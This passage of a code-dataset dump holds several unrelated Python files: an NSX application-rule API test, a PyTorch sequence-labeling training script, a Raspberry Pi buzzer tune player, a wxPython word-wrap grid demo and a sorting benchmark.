x_is_not_ok or y_is_not_ok:\n continue\n\n x_test, y_test = self.__append_sample(x_test, y_test, x, y)\n i += 1\n return x_test, y_test\n\n def __make_input_batch(self, batch_size):\n x_batch = np.empty((0, self.time_size, self.freq_size, 1))\n\n i = 0\n while i < batch_size:\n sample_name, start_idx, end_idx = self.extract_samplename_and_offset(\n self.train_set[self.train_counter])\n self.train_counter += 1\n\n x = self.read_input(sample_name, start_idx, end_idx)\n\n x_is_not_ok = self.__check_x(x)\n if x_is_not_ok:\n continue\n\n x_batch = self.__append_input(x_batch, x)\n i += 1\n\n return x_batch\n\n def __check_x(self, x):\n x_is_not_ok = False\n if x.size == 0:\n x_is_not_ok = True\n return x_is_not_ok\n\n def __check_y(self, y, regression_mode):\n y_is_not_ok = False\n if y.size < self.time_size and not regression_mode:\n y_is_not_ok = True\n if y.size != 1 and regression_mode:\n y_is_not_ok = True\n return y_is_not_ok\n\n def __get_train_test_samples(self, train_test_ratio: float, validation_ratio: float):\n self.n_samples = self.dataset.shape[0]\n\n temp_n_train = int(self.n_samples * train_test_ratio)\n\n self.n_test = self.n_samples - temp_n_train\n\n self.n_validation = int(temp_n_train * validation_ratio)\n self.n_train = temp_n_train - self.n_validation\n\n train_set = self.dataset[:self.n_train]\n print('train_set --> to_index:', self.n_train)\n validation_set = self.dataset[self.n_train: self.n_train + self.n_validation]\n print('validation_set --> from-to_index:', self.n_train, 'to', self.n_train + self.n_validation)\n test_set = self.dataset[self.n_train + self.n_validation:]\n print('test_set --> from_index', self.n_train + self.n_validation)\n\n return train_set, validation_set, test_set\n","sub_path":"poi_detector/src/dataset/load_dataset/data_generator2.py","file_name":"data_generator2.py","file_ext":"py","file_size_in_byte":16045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"226879611","text":"#!/usr/bin/env python\n# coding=utf-8\n#\n# Copyright © 2015 VMware, Inc. All Rights Reserved.\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated\n# documentation files (the \"Software\"), to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and\n# to permit persons to whom the Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all copies or substantial portions\n# of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED\n# TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF\n# CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS\n# IN THE SOFTWARE.\n\nfrom tests.config import *\nfrom nsxramlclient.client import NsxClient\n\n\n__author__ = 'shrirang'\n\n\ndef create_application_rule(session, edge_id='edge-1'):\n app_rule_spec = session.extract_resource_body_schema('appRules', 'create')\n\n app_rule_spec['applicationRule']['name'] = 'raml_test'\n app_rule_spec['applicationRule']['script'] = 'acl vmware_page url_beg /vmware redirect ' \\\n 'location https://www.vmware.com/ if vmware_page'\n\n create_response = session.create('appRules', uri_parameters={'edgeId': edge_id},\n request_body_dict=app_rule_spec)\n\n session.view_response(create_response)\n\n return create_response['objectId']\n\n\ndef application_rule_by_id(session, object_id, edge_id='edge-1'):\n response = session.read('appRule', uri_parameters={'edgeId': edge_id, 'appruleID': object_id})\n session.view_response(response)\n\n\ndef application_rule(session, edge_id='edge-1'):\n response = session.read('appRules', uri_parameters={'edgeId': edge_id})\n session.view_response(response)\n\n\ndef update_application_rule(session, object_id, edge_id='edge-1'):\n app_rule_spec = session.extract_resource_body_schema('appRule', 'update')\n\n app_rule_spec['applicationRule']['name'] = 'raml_test'\n app_rule_spec['applicationRule']['script'] = 'acl vmware_page_new url_beg /vmware redirect ' \\\n 'location https://www.vmware.com/ if vmware_page_new'\n response = session.update('appRule', uri_parameters={'edgeId': edge_id, 'appruleID': object_id},\n request_body_dict=app_rule_spec)\n\n session.view_response(response)\n\n\ndef delete_application_rule_by_id(session, object_id, edge_id='edge-1'):\n response = session.delete('appRule', uri_parameters={'edgeId': edge_id, 'appruleID': object_id})\n\n session.view_response(response)\n\n\ndef delete_application_rule(session, edge_id='edge-1'):\n response = session.delete('appRules', uri_parameters={'edgeId': edge_id})\n\n session.view_response(response)\n\n\ndef main():\n session = NsxClient(nsxraml_file, nsxmanager, nsx_username, nsx_password, debug=True)\n\n object_id = create_application_rule(session)\n\n application_rule_by_id(session, object_id)\n\n application_rule(session)\n\n update_application_rule(session, object_id)\n\n delete_application_rule_by_id(session, object_id)\n\n delete_application_rule(session)\n\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"tests/application_rule.py","file_name":"application_rule.py","file_ext":"py","file_size_in_byte":3648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"565624033","text":"# -*-coding:utf-8-*-\nimport sys\nfrom optparse import OptionParser\n\nimport torch\nimport yaml\nfrom torch import optim\n\nfrom infer import Inference\nfrom model.sequence_labeling_trainer import SLTrainer\nfrom nn.dataset import *\nfrom nn.modules import *\nfrom util.common_util import *\nfrom util.data_analyse_util import *\nfrom util.embedding import *\n\n\ndef extract_feature_dict(feature_cols, feature_names, feature_dict, data_path,\n sentence_lens=None, normalize=True, has_label=True):\n \"\"\"Collect feature statistics from the data\n Args:\n feature_cols: list(int), column indices of the features\n feature_names: list(str), feature names\n feature_dict: dict\n data_path: str, data path\n sentence_lens: list, used to record sentence lengths\n normalize: bool, whether to normalize words\n 
has_label: bool, whether the data is labeled\n \"\"\"\n data_idx = 0\n data = load_data(data_path)\n for i, train_list in enumerate(data):\n update_feature_dict(\n train_list, feature_dict, feature_cols, feature_names,\n normalize=normalize, has_label=has_label)\n sentence_lens.append(len(train_list[0]))\n data_idx += 1\n return data_idx, data\n\n\ndef update_feature_dict(train_list, feature_dict, feature_cols, feature_names,\n normalize=True, has_label=True):\n \"\"\"\n Update the feature dictionary\n Args:\n train_list: list(list) [[word,tag,fileName],...]\n feature_dict: dict\n feature_cols: list(int)\n feature_names: list(str)\n normalize: bool, whether to normalize words\n has_label: bool\n \"\"\"\n for i, col in enumerate(feature_cols):\n for token in train_list[col]:\n if normalize:\n token = normalize_word(token)\n feature_dict[feature_names[i]].update([token])\n if has_label:\n for label in train_list[1]:\n feature_dict['label'].add(label)\n\n\ndef pre_processing(configs):\n path_train = configs['data_params']['path_train']\n path_dev = configs['data_params']['path_dev'] if 'path_dev' in configs['data_params'] else None\n path_test = configs['data_params']['path_test'] if 'path_test' in configs['data_params'] else None\n\n feature_cols = configs['data_params']['feature_cols']\n feature_names = configs['data_params']['feature_names']\n min_counts = configs['data_params']['alphabet_params']['min_counts']\n root_alphabet = configs['data_params']['alphabet_params']['path']\n path_pretrain_list = configs['data_params']['path_pretrain']\n\n use_char = configs['model_params']['use_char']\n max_word_len = configs['model_params']['char_max_len']\n\n normalize = configs['word_norm']\n feature_dict = {}\n for feature_name in feature_names:\n feature_dict[feature_name] = Counter()\n feature_dict['label'] = set()\n sentence_lens = []\n # Process the train, dev and test data\n print('Reading files...')\n data_count, train_data = extract_feature_dict(\n feature_cols, feature_names, feature_dict, path_train, sentence_lens,\n normalize=normalize, has_label=True, )\n print('`{0}`: {1}'.format(path_train, data_count))\n data_count, test_data = extract_feature_dict(\n feature_cols, feature_names, feature_dict, path_test, sentence_lens,\n normalize=normalize, has_label=True, )\n print('`{0}`: {1}'.format(path_test, data_count))\n\n # Build the label alphabet\n token2id_dict = dict()\n label2id_dict = dict()\n for label_idx, label in enumerate(sorted(feature_dict['label'])):\n label2id_dict[label] = label_idx + 1 # ids start from 1\n token2id_dict['label'] = label2id_dict\n path_label2id_pkl = os.path.join(root_alphabet, 'label.pkl')\n if not is_file_exist(root_alphabet):\n os.makedirs(root_alphabet)\n dump_pkl_data(label2id_dict, path_label2id_pkl)\n\n # Build the feature alphabets\n for i, feature_name in enumerate(feature_names):\n feature2id_dict = dict()\n start_idx = 1\n for item in sorted(feature_dict[feature_name].items(), key=lambda d: d[1], reverse=True):\n if item[1] < min_counts[i]:\n continue\n feature2id_dict[item[0]] = start_idx\n start_idx += 1\n token2id_dict[feature_name] = feature2id_dict\n # write to file\n dump_pkl_data(feature2id_dict, os.path.join(root_alphabet, '{0}.pkl'.format(feature_name)))\n dump_pkl_data(token2id_dict, os.path.join(root_alphabet, 'token2id_dict.pkl'))\n\n # Build the embedding tables\n print('Extracting pretrained word embeddings...')\n for i, feature_name in enumerate(feature_names):\n if path_pretrain_list[i]:\n print('Feature `{0}` uses pretrained embeddings `{1}`:'.format(feature_name, path_pretrain_list[i]))\n word_embed_table, exact_match_count, fuzzy_match_count, unknown_count, total_count = build_word_embed(\n 
token2id_dict[feature_name], path_pretrain_list[i])\n print('\\tExact matches: {0} / {1}'.format(exact_match_count, total_count))\n print('\\tFuzzy matches: {0} / {1}'.format(fuzzy_match_count, total_count))\n print('\\tOOV: {0} / {1}'.format(unknown_count, total_count))\n # write to file\n path_pkl = os.path.join(os.path.dirname(path_pretrain_list[i]), '{0}.embed.pkl'.format(feature_name))\n dump_pkl_data(word_embed_table, path_pkl)\n # Convert tokens to ids\n # train\n train_data_tokens2id_dict = {}\n for j, col in enumerate(feature_cols):\n feature_name = feature_names[j]\n for sentence in train_data:\n array = tokens2id_array(sentence[col], token2id_dict[feature_name])\n if feature_name not in train_data_tokens2id_dict:\n train_data_tokens2id_dict[feature_name] = list()\n train_data_tokens2id_dict[feature_name].append(array)\n if \"label\" not in train_data_tokens2id_dict:\n train_data_tokens2id_dict[\"label\"] = list()\n label_arr = tokens2id_array(sentence[1], token2id_dict['label'])\n train_data_tokens2id_dict['label'].append(label_arr)\n data_tokens2id_dict_path = os.path.join(os.path.dirname(path_train), 'train.token2id.pkl')\n dump_pkl_data(train_data_tokens2id_dict, data_tokens2id_dict_path)\n # test\n test_data_tokens2id_dict = {}\n for j, col in enumerate(feature_cols):\n feature_name = feature_names[j]\n for sentence in test_data:\n array = tokens2id_array(sentence[col], token2id_dict[feature_name])\n if feature_name not in test_data_tokens2id_dict:\n test_data_tokens2id_dict[feature_name] = list()\n test_data_tokens2id_dict[feature_name].append(array)\n if \"label\" not in test_data_tokens2id_dict:\n test_data_tokens2id_dict[\"label\"] = list()\n label_arr = tokens2id_array(sentence[1], token2id_dict['label'])\n test_data_tokens2id_dict['label'].append(label_arr)\n data_tokens2id_dict_path = os.path.join(os.path.dirname(path_train), 'test.token2id.pkl')\n dump_pkl_data(test_data_tokens2id_dict, data_tokens2id_dict_path)\n\n\ndef init_model(configs):\n \"\"\"Initialize the model\n Returns:\n model: SLModel\n \"\"\"\n use_char = configs['model_params']['use_char']\n\n feature_names = configs['data_params']['feature_names']\n # init feature alphabet size dict\n feature_size_dict = dict()\n root_alphabet = configs['data_params']['alphabet_params']['path']\n for feature_name in feature_names:\n alphabet = read_bin(os.path.join(root_alphabet, '{0}.pkl'.format(feature_name)))\n feature_size_dict[feature_name] = len(alphabet) + 1\n alphabet = read_bin(os.path.join(root_alphabet, 'label.pkl'))\n feature_size_dict['label'] = len(alphabet) + 1\n if use_char:\n alphabet = read_bin(os.path.join(root_alphabet, 'char.pkl'))\n feature_size_dict['char'] = len(alphabet) + 1\n\n # init feature dim size dict and pretrain embed dict\n path_pretrain_list = configs['data_params']['path_pretrain']\n embed_sizes = configs['model_params']['embed_sizes']\n feature_dim_dict = dict()\n for i, feature_name in enumerate(feature_names):\n feature_dim_dict[feature_name] = embed_sizes[i]\n pretrained_embed_dict = dict()\n for i, feature_name in enumerate(feature_names):\n if path_pretrain_list[i]:\n path_pkl = os.path.join(os.path.dirname(path_pretrain_list[i]), '{0}.embed.pkl'.format(feature_name))\n embed = read_bin(path_pkl)\n feature_dim_dict[feature_name] = embed.shape[-1]\n pretrained_embed_dict[feature_name] = embed\n if use_char:\n feature_dim_dict['char'] = configs['model_params']['char_dim']\n\n # init requires_grad_dict\n require_grads = configs['model_params']['require_grads']\n require_grad_dict = {}\n for i, feature_name in 
enumerate(feature_names):\n require_grad_dict[feature_name] = require_grads[i]\n if use_char:\n require_grad_dict['char'] = configs['model_params']['char_requires_grad']\n\n # init char parameters\n filter_sizes = configs['model_params']['conv_filter_sizes']\n filter_nums = configs['model_params']['conv_filter_nums']\n\n # init rnn parameters\n rnn_unit_type = configs['model_params']['rnn_type']\n num_rnn_units = configs['model_params']['rnn_units']\n num_layers = configs['model_params']['rnn_layers']\n bi_flag = configs['model_params']['bi_flag']\n\n use_crf = configs['model_params']['use_crf']\n\n # init other parameters\n dropout_rate = configs['model_params']['dropout_rate']\n average_batch = configs['model_params']['average_batch']\n deterministic = configs['model_params']['deterministic']\n use_cuda = configs['model_params']['use_cuda']\n\n # init model\n sl_model = SLModel(\n feature_names=feature_names, feature_size_dict=feature_size_dict, feature_dim_dict=feature_dim_dict,\n pretrained_embed_dict=pretrained_embed_dict, require_grad_dict=require_grad_dict, use_char=use_char,\n filter_sizes=filter_sizes, filter_nums=filter_nums, rnn_unit_type=rnn_unit_type, num_rnn_units=num_rnn_units,\n num_layers=num_layers, bi_flag=bi_flag, dropout_rate=dropout_rate, average_batch=average_batch,\n use_crf=use_crf, use_cuda=use_cuda)\n\n if deterministic: # for deterministic\n torch.backends.cudnn.enabled = False\n\n use_cuda = configs['model_params']['use_cuda']\n if use_cuda:\n sl_model = sl_model.cuda()\n\n return sl_model\n\n\ndef init_train_data(configs):\n \"\"\"Initialize the training data\n Returns:\n data_iter_train: DataIter\n data_iter_dev: DataIter\n \"\"\"\n path_train = configs['data_params']['path_train']\n char_max_len = configs['model_params']['char_max_len']\n batch_size = configs['model_params']['batch_size']\n max_len_limit = configs['max_len_limit']\n\n features_names = configs['data_params']['feature_names']\n data_names = [name for name in features_names]\n use_char = configs['model_params']['use_char']\n if use_char:\n data_names.append('char')\n data_names.append('label')\n\n # load train data\n train_object_dict = read_bin(os.path.join(os.path.dirname(path_train), 'train.token2id.pkl'))\n train_count = len(train_object_dict[data_names[0]])\n\n # Split into train and dev sets\n data_utils = DataUtil(\n train_count, train_object_dict, data_names, use_char=use_char, char_max_len=char_max_len,\n batch_size=batch_size, max_len_limit=max_len_limit)\n data_iter_train, data_iter_dev = data_utils.split_dataset(proportions=(8, 2), shuffle=False)\n\n return data_iter_train, data_iter_dev\n\n\ndef init_test_data(configs):\n \"\"\"Initialize the test data\n Returns:\n data_test: DataRaw\n data_iter_test: DataIter\n \"\"\"\n path_train = configs['data_params']['path_train']\n char_max_len = configs['model_params']['char_max_len']\n batch_size = configs['model_params']['batch_size']\n max_len_limit = configs['max_len_limit']\n\n features_names = configs['data_params']['feature_names']\n data_names = [name for name in features_names]\n use_char = configs['model_params']['use_char']\n if use_char:\n data_names.append('char')\n data_names.append('label')\n\n # load test data\n test_object_dict = read_bin(os.path.join(os.path.dirname(path_train), 'test.token2id.pkl'))\n\n # Wrap the test set\n data_utils = DataUtil(\n len(test_object_dict[\"word\"]), test_object_dict, data_names, use_char=use_char, char_max_len=char_max_len,\n batch_size=batch_size, max_len_limit=max_len_limit)\n [data_iter_test] = data_utils.split_dataset(proportions=(1,), shuffle=False)\n\n 
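# split_dataset with proportions=(1,) returns a single DataIter covering the whole test set, so nothing is held out here.\n 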
return data_iter_test\n\n\ndef init_optimizer(configs, model):\n \"\"\"Initialize the optimizer\n Returns:\n optimizer\n \"\"\"\n optimizer_type = configs['model_params']['optimizer']\n learning_rate = configs['model_params']['learning_rate']\n l2_rate = configs['model_params']['l2_rate']\n momentum = configs['model_params']['momentum']\n lr_decay = 0\n # Filter out parameters that do not require gradient updates\n parameters = filter(lambda p: p.requires_grad, model.parameters())\n\n if optimizer_type.lower() == \"sgd\":\n lr_decay = configs['model_params']['lr_decay']\n optimizer = optim.SGD(parameters, lr=learning_rate, momentum=momentum, weight_decay=l2_rate)\n elif optimizer_type.lower() == \"adagrad\":\n optimizer = optim.Adagrad(parameters, lr=learning_rate, weight_decay=l2_rate)\n elif optimizer_type.lower() == \"adadelta\":\n optimizer = optim.Adadelta(parameters, lr=learning_rate, weight_decay=l2_rate)\n elif optimizer_type.lower() == \"rmsprop\":\n optimizer = optim.RMSprop(parameters, lr=learning_rate, weight_decay=l2_rate)\n elif optimizer_type.lower() == \"adam\":\n optimizer = optim.Adam(parameters, lr=learning_rate, weight_decay=l2_rate)\n else:\n print('Please choose a valid optimizer: {0}'.format(optimizer_type))\n exit()\n return optimizer, lr_decay\n\n\ndef init_trainer(configs, data_iter_train, data_iter_dev, model, optimizer, lr_decay):\n \"\"\"Initialize the model trainer\n Returns:\n trainer: SLTrainer\n \"\"\"\n feature_names = configs['data_params']['feature_names']\n use_char = configs['model_params']['use_char']\n max_len_char = configs['model_params']['char_max_len']\n path_save_model = configs['data_params']['path_model']\n if not is_file_exist(path_save_model):\n os.makedirs(path_save_model)\n\n nb_epoch = configs['model_params']['nb_epoch']\n max_patience = configs['model_params']['max_patience']\n\n learning_rate = configs['model_params']['learning_rate']\n\n trainer = SLTrainer(\n data_iter_train=data_iter_train, data_iter_dev=data_iter_dev, feature_names=feature_names,\n use_char=use_char, max_len_char=max_len_char, model=model, optimizer=optimizer,\n path_save_model=path_save_model, nb_epoch=nb_epoch, max_patience=max_patience,\n learning_rate=learning_rate, lr_decay=lr_decay)\n\n return trainer\n\n\ndef load_model(configs):\n \"\"\"Load the pretrained model\n \"\"\"\n model = init_model(configs)\n\n path_model = os.path.join(configs['data_params']['path_model'], \"sequence_model\")\n model_state = torch.load(path_model)\n model.load_state_dict(model_state)\n return model\n\n\ndef train_model(configs):\n \"\"\"Train the model\n \"\"\"\n # init model\n sl_model = init_model(configs)\n print(sl_model)\n\n # init data\n data_iter_train, data_iter_dev = init_train_data(configs)\n\n # init optimizer\n optimizer, lr_decay = init_optimizer(configs, model=sl_model)\n\n # init trainer\n model_trainer = init_trainer(\n configs, data_iter_train, data_iter_dev, sl_model, optimizer, lr_decay)\n\n model_trainer.fit()\n\n\ndef test_model(configs):\n \"\"\"Test the model\n \"\"\"\n path_test = configs['data_params']['path_test'] if 'path_test' in configs['data_params'] else None\n # init model\n model = load_model(configs)\n\n # init test data\n data_test = load_data(path_test)\n data_iter_test = init_test_data(configs)\n\n # init infer\n if 'path_test_result' not in configs['data_params'] or \\\n not configs['data_params']['path_test_result']:\n path_result = configs['data_params']['path_test'] + '.result'\n else:\n path_result = configs['data_params']['path_test_result']\n # label to id dict\n path_pkl = os.path.join(configs['data_params']['alphabet_params']['path'], 'label.pkl')\n 
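# label.pkl was written by pre_processing() and maps each label string to its integer id (ids start at 1).\n 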
label2id_dict = read_bin(path_pkl)\n infer = Inference(\n model=model, data_iter=data_iter_test, data_raw=data_test,\n path_result=path_result, label2id_dict=label2id_dict)\n\n # do infer\n infer.infer2file()\n\n\ndef parse_opts():\n op = OptionParser()\n op.add_option(\n '-c', '--config', dest='config', type='str', help='path to the config file')\n op.add_option('--train', dest='train', action='store_true', default=True, help='training mode')\n op.add_option('--test', dest='test', action='store_true', default=False, help='test mode')\n op.add_option(\n '-p', '--preprocess', dest='preprocess', action='store_true', default=False, help='whether to run preprocessing')\n argv = [] if not hasattr(sys.modules['__main__'], '__file__') else sys.argv[1:]\n (opts, args) = op.parse_args(argv)\n if not opts.config:\n op.print_help()\n exit()\n if opts.test:\n opts.train = False\n return opts\n\n\ndef main():\n opts = parse_opts()\n configs = yaml.load(codecs.open(opts.config, encoding='utf-8'), Loader=None)\n\n if opts.train: # train\n # Check whether preprocessing is needed\n if opts.preprocess:\n pre_processing(configs)\n print(\"Preprocessing finished, starting model training...\")\n # Train\n train_model(configs)\n print(\"Training finished, starting testing...\")\n # test\n test_model(configs)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":17870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"121618625","text":"#!/usr/bin/env python\nimport RPi.GPIO as GPIO\nimport time\n\nBZRPin = 40\n\nGPIO.setmode(GPIO.BOARD)\t # Numbers pins by physical location\nGPIO.setup(BZRPin, GPIO.OUT) # Set pin mode as output\nGPIO.output(BZRPin, GPIO.LOW)\n\n#Dictionary for notes\n\nnotes = {\n\t'D3': 146.83,\n\t'E3': 164.81,\n\t'F3': 174.61,\n\t'G3': 196.00,\n\t'C4': 261.63,\n\t'D4': 293.66,\n\t'E4': 329.63,\n\t'F4': 349.23,\n\t'G4': 392.00,\n\t'A4': 440.00,\n}\n\npins = {\n\t'A': 11,\n\t'C': 12,\n\t'D': 13,\n\t'E': 15,\n\t'F': 16,\n\t'G': 18,\n}\n\nTWINKLE_1 = 'C4,,C4,,G4,,G4,,A4,,A4,,G4,G4,G4,'\n\nTWINKLE_2 = 'F4,,F4,,E4,,E4,,D4,,D4,,C4,C4,C4,'\n\nTWINKLE_3 = 'G3,,G3,,F3,,F3,,E3,,E3,,D3,D3,D3,'\n\nTWINKLE = ','.join([TWINKLE_1, TWINKLE_2, TWINKLE_3, TWINKLE_3, TWINKLE_1, TWINKLE_2])\n\n#DOADEER = 'CDECECE' Forget this\n\nSLEEP_TIME = 0.25\n\ndef LEDnote(LED, command):\n\tif command == 'On':\n\t\tGPIO.output(pins[LED], GPIO.LOW)\n\tif command == 'Off':\n\t\tGPIO.output(pins[LED], GPIO.HIGH)\n\ndef main():\n\tfor pin in pins.values():\n\t\tGPIO.setup(pin, GPIO.OUT)\n\n\tp = GPIO.PWM(BZRPin, 50) # init frequency: 50HZ\n\n\ttry:\n\t\tstarted = False\n\t\tfor note in TWINKLE.split(\",\"):\n\t\t\tif note.strip() == '':\n\t\t\t\tif started:\n\t\t\t\t\tstarted = False\n\t\t\t\t\tp.stop()\n\t\t\t\ttime.sleep(SLEEP_TIME)\n\t\t\t\tcontinue\n\t\t\tf = notes.get(note)\n\t\t\tp.ChangeFrequency(f)\n\t\t\tSNote = ''\n\t\t\tSNote = note[0]\n\t\t\tLEDnote(SNote, 'On')\n\t\t\tif not started:\n\t\t\t\tstarted = True\n\t\t\t\tp.start(50)\n\t\t\ttime.sleep(SLEEP_TIME)\n\t\t\tLEDnote(SNote, 'Off')\n\texcept KeyboardInterrupt:\n\t\tpass\n\tfinally:\n\t\tLEDnote(SNote, 'Off')\n\t\tSNote = ''\n\t\tp.stop()\n\t\tGPIO.cleanup()\n\nif __name__ == \"__main__\":\n\tmain()\n\n","sub_path":"twinklewlights.py","file_name":"twinklewlights.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"280114573","text":"import wx\r\nimport wx.grid\r\nfrom wx.lib import wordwrap\r\nfrom wx.lib.mixins.grid import GridAutoEditMixin \r\n\r\n# from 
http://stackoverflow.com/questions/5868280/auto-wrap-and-newlines-in-wxpython-grid\r\n# ---------------------------------------------------------------------------------------\r\nclass CustomGridCellAutoWrapStringRenderer(wx.grid.PyGridCellRenderer): \r\n def __init__(self): \r\n wx.grid.PyGridCellRenderer.__init__(self)\r\n\r\n def Draw(self, grid, attr, dc, rect, row, col, isSelected):\r\n text = grid.GetCellValue(row, col)\r\n dc.SetFont( attr.GetFont() ) \r\n text = wordwrap.wordwrap(text, grid.GetColSize(col), dc, breakLongWords = False)\r\n hAlign, vAlign = attr.GetAlignment() \r\n if isSelected: \r\n bg = grid.GetSelectionBackground() \r\n fg = grid.GetSelectionForeground() \r\n else: \r\n bg = attr.GetBackgroundColour()\r\n fg = attr.GetTextColour() \r\n dc.SetTextBackground(bg) \r\n dc.SetTextForeground(fg)\r\n dc.SetBrush(wx.Brush(bg, wx.SOLID))\r\n dc.SetPen(wx.TRANSPARENT_PEN)\r\n dc.DrawRectangleRect(rect) \r\n grid.DrawTextRectangle(dc, text, rect, hAlign, vAlign)\r\n\r\n def GetBestSize(self, grid, attr, dc, row, col): \r\n text = grid.GetCellValue(row, col)\r\n dc.SetFont(attr.GetFont())\r\n text = wordwrap.wordwrap(text, grid.GetColSize(col), dc, breakLongWords = False)\r\n w, h, lineHeight = dc.GetMultiLineTextExtent(text) \r\n return wx.Size(w, h) \r\n\r\n def Clone(self): \r\n return CustomGridCellAutoWrapStringRenderer()\r\n\r\nclass MyGrid (wx.grid.Grid, GridAutoEditMixin ):\r\n def __init__ (self, parent, size):\r\n wx.grid.Grid.__init__(self, parent,size=size)\r\n GridAutoEditMixin.__init__(self)\r\n \r\n\r\nclass MyFrame(wx.Frame):\r\n def __init__(self, parent = None, id = -1, title = \"My Test\"):\r\n wx.Frame.__init__(self, parent, id, title, size=((350,300)) )\r\n\r\n panel = wx.Panel(self)\r\n\r\n button1 = wx.Button(panel, id=-1, label='Button1', pos=( 10, 220))\r\n button2 = wx.Button(panel, id=-1, label='Button2', pos=(110, 220))\r\n button3 = wx.Button(panel, id=-1, label='Button3', pos=(210, 220))\r\n\r\n grid = MyGrid (panel, size=(350, 200))\r\n #grid = wx.grid.Grid(panel, size=(350, 200))\r\n grid.CreateGrid(3, 3)\r\n\r\n grid.SetDefaultRenderer(CustomGridCellAutoWrapStringRenderer()) #use custom renderer\r\n\r\n grid.SetRowSize(0, 50)\r\n grid.SetRowSize(1, 50)\r\n grid.SetRowSize(2, 50)\r\n\r\n attr = self.setCellAttrib2()\r\n for i in range (grid.GetNumberRows()):\r\n grid.SetAttr(i, 0, attr) \r\n grid.SetAttr(i, 1, attr) \r\n grid.SetAttr(i, 2, attr) \r\n grid.SetRowMinimalAcceptableHeight (50)\r\n\r\n grid.SetCellValue(0, 0, \"1\\n2\\n3\\non sep lines?\")\r\n grid.SetCellValue(0, 1, \"Press Enter\\nfor a new line?\")\r\n grid.AutoSizeRows(setAsMin = True)\r\n \r\n self.grid = grid\r\n \r\n self.Center()\r\n self.Show() \r\n\r\n grid.Bind(wx.grid.EVT_GRID_EDITOR_CREATED, self.OnEditorCreated)\r\n grid.Bind(wx.grid.EVT_GRID_SELECT_CELL, self.OnSelectCell) \r\n \r\n \r\n def setCellAttrib2(self):\r\n attr = wx.grid.GridCellAttr()\r\n attr.SetFont(wx.Font(8, wx.ROMAN, wx.NORMAL, wx.NORMAL, False, 'Tahoma'))\r\n attr.SetAlignment(wx.ALIGN_LEFT, wx.ALIGN_LEFT) \r\n attr.SetEditor(wx.grid.GridCellAutoWrapStringEditor()) \r\n #attr.SetRenderer(wx.grid.GridCellAutoWrapStringRenderer()) #Use CustomGridCellAutoWrapStringRenderer\r\n attr.IncRef()\r\n return attr\r\n \r\n \r\n def OnSelectCell(self, event):\r\n self.row = event.GetRow()\r\n self.col = event.GetCol() \r\n #print \"Selected R/C** 1\", self.row, self.col\r\n #print self.grid.GetCellValue(self.row, self.col)\r\n# self.grid.AutoSizeRow(self.row, setAsMin = True) \r\n\r\n # Enable this line to 
autosize newly entered text\r\n #------------------------------------------------\r\n self.grid.AutoSizeRows(setAsMin = True)\r\n event.Skip() \r\n\r\n\r\n\r\n# from https://groups.google.com/forum/?hl=en&fromgroups=#!searchin/wxpython-users/\r\n# newline$20wx.grid/wxpython-users/bMiG-jN03k4/uf4svkiAlJ0J\r\n# ---------------------------------------------------------------------------------\r\n def OnEditorCreated(self, event):\r\n def HandleKey(event):\r\n #print self.row,self.col, 'Key=',event.KeyCode\r\n if event.KeyCode == wx.WXK_RETURN:\r\n event.GetEventObject().WriteText('\\n')\r\n #print \"GOT IT\"\r\n else:\r\n event.Skip()\r\n\r\n # Since the grid pushes a new wx.EvtHandler onto the control's\r\n # event handler stack, Bind to the first event handler on the\r\n # stack instead of directly to the control so we can get first\r\n # crack at the event.\r\n ctrlEH = event.GetControl().GetEventHandler()\r\n ctrlEH.Bind(wx.EVT_KEY_DOWN, HandleKey)\r\n \r\n\r\n\r\ndef main():\r\n app = wx.App()\r\n MyFrame()\r\n app.MainLoop()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","sub_path":"game/cellWrap4.py","file_name":"cellWrap4.py","file_ext":"py","file_size_in_byte":5295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"147115379","text":"\nimport config as cf\nimport controller\nfrom DISClib.ADT import list as lt\nassert cf\n\ndef prueba(tamano_lista:int,tipo_lista:int,tipo_ordenamiento:int)->float:\n tipo_lista=str(tipo_lista)\n catalog = controller.initCatalog(tipo_lista)\n controller.loadData(catalog)\n tamano_datos_cargados = lt.size(catalog['videos'])+1\n result = controller.sort_videos(catalog, tipo_ordenamiento, tamano_lista)\n return float(result[0])\n\ndef ejecutar_prueba()->None:\n nombre_csv=input(\"Enter the name of the csv file where the data should be saved: \")\n tamano_maximo=int(input('Enter the maximum amount of data to analyze: '))\n archivo=open(nombre_csv,'w')\n archivo.write('Tamaño,QuickSort-Array,MergeSort-Array,QuickSort-Linked,MergeSort-Linked\\n')\n size=1000\n cadena=str(size)+','\n i=0\n while size <= tamano_maximo:\n if i==0:\n # Compute quicksort on the array list\n tiempo1=prueba(size,2,1)\n tiempo2=prueba(size,2,1)\n tiempo3=prueba(size,2,1)\n promedio=(tiempo1+tiempo2+tiempo3)/3\n cadena+=str(promedio)+'\\n'\n \"\"\"elif i==1:\n # Compute mergesort on the array list\n tiempo1=prueba(size,2,2)\n tiempo2=prueba(size,2,2)\n tiempo3=prueba(size,2,2)\n promedio=(tiempo1+tiempo2+tiempo3)/3\n 